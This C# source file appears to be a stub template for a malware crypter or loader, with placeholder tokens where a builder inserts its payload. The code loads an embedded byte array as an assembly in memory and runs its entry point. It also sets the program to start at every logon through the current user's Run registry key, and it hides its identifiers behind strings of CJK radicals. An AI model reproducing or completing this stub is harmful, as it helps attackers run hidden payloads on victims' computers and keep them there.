﻿using Microsoft.Win32;

using System;
using System.Reflection;
using System.Windows.Forms;

[AssemblyHere]

namespace @WindowsFormsApp
{
    static class @Program
    {
 
        [STAThread]
        static void Main()
        {
            byte[] 爿豆雨宀龜入匕牙卩目儿子彡土而工牙干冂幺聿癶首麥歹文片支厂乙色隹黹夂乙爿彳門玄骨立穴瓦片巾爪勹玉歹舟毋鬥龜戈手 = new byte[654321]
            {
            123456
            };
            @AddStartup
            //阜隶几殳鼎氏癶毛豸豆疒辰鼠白肉赤疋儿爻牙比皿干刀殳比尢爿文角士无匕癶米曰工几夕爪尢();
        Assembly.Load(爿豆雨宀龜入匕牙卩目儿子彡土而工牙干冂幺聿癶首麥歹文片支厂乙色隹黹夂乙爿彳門玄骨立穴瓦片巾爪勹玉歹舟毋鬥龜戈手).EntryPoint.Invoke(null, null);

        }


        public static void 阜隶几殳鼎氏癶毛豸豆疒辰鼠白肉赤疋儿爻牙比皿干刀殳比尢爿文角士无匕癶米曰工几夕爪尢()
        {
            RegistryKey 手廾冖毋骨戈示斗尢牛二丿米乙手几冖戶彡匸气山冂酉犬矛山文黃弋谷火攴气匕疋牙卩骨勹 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            手廾冖毋骨戈示斗尢牛二丿米乙手几冖戶彡匸气山冂酉犬矛山文黃弋谷火攴气匕疋牙卩骨勹.SetValue("臼曰靑入工氏長弓黹幺片厶辛无匚月歹缶夂血几乙見麻龠谷刀血至辵支夂卩欠魚斤小雨鼠黽十手鼓矛臣見弋匚艮匕辵干弓子几", Application.ExecutablePath);
        }
    }
}
